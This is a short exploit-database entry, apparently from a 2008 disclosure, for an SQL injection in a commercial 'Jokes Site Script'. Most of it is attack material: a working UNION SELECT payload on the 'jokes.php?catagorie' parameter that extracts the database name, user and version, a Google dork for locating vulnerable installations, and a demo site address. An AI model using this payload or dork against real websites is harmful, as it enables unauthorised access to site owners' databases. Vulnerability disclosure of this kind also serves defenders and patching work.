id: 2928
date: 04/26/2008
title: Jokes Site Script (jokes.php?catagorie) SQL Injection Vulnerability
author: ProgenTR
cves: 

===================================================================
Jokes Site Script (jokes.php?catagorie) SQL Injection Vulnerability
===================================================================



author:ProgenTR

scriptismi:Jokes Site Script

fiyat:$49

demo:http://www.autowebhits.com/jokesite/

jokes.php?catagorie=-1%20union%20select%201,convert(concat(database(),char(58),user(),char(58),version()),char)/*


dork:allinurl:"jokes.php?catagorie="




#  0day.today [2023-03-27]  #